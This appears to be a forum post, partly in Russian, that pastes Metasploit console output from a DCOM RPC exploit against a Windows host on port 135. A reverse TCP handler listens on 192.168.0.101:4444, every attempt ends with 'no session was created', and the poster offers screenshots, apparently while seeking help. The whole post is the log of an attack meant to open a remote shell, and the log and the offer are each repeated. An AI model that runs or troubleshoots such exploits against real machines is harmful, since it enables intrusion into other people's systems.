Started reverse TCP handler on 192.168.0.101:4444
[*] 192.168.0.103:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.103:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.103[135] ...
[*] 192.168.0.103:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Exploit completed, but no session was created.
===
Если нужны скрины вы попросите я вам скину
[*] 192.168.0.103:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.103:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.103[135] ...
[*] 192.168.0.103:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Exploit completed, but no session was created.
===
Если нужны скрины вы попросите я вам скину